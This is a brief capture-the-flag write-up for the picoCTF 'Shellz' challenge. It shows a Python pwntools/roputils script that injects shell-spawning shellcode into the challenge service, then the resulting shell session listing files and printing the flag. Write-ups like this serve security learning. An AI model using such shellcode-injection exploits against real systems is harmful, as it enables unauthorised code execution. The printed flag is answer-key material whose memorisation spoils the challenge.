[Go back](./Rreadme.md)

### Shellz - 55 points

I used [roputils](https://github.com/inaz2/roputils) to generate some shellcode, as the executable just runs whatever bytes it's given:

```py
import roputils, pwn
s = roputils.Shellcode("i386")
nc = pwn.remote("shell2017.picoctf.com", 24630)
nc.send(s.nopfill(s.exec_shell(), 40) + "\n")
nc.interactive()
```

```
My mother told me to never accept things from strangers
How bad could running a couple bytes be though?
Give me 40 bytes:
$ ls
flag.txt
shellz
shellz_no_aslr
xinetd_wrapper.sh
$ cat flag.txt
e7ab8af95673759fa3568c3c38098f16
```
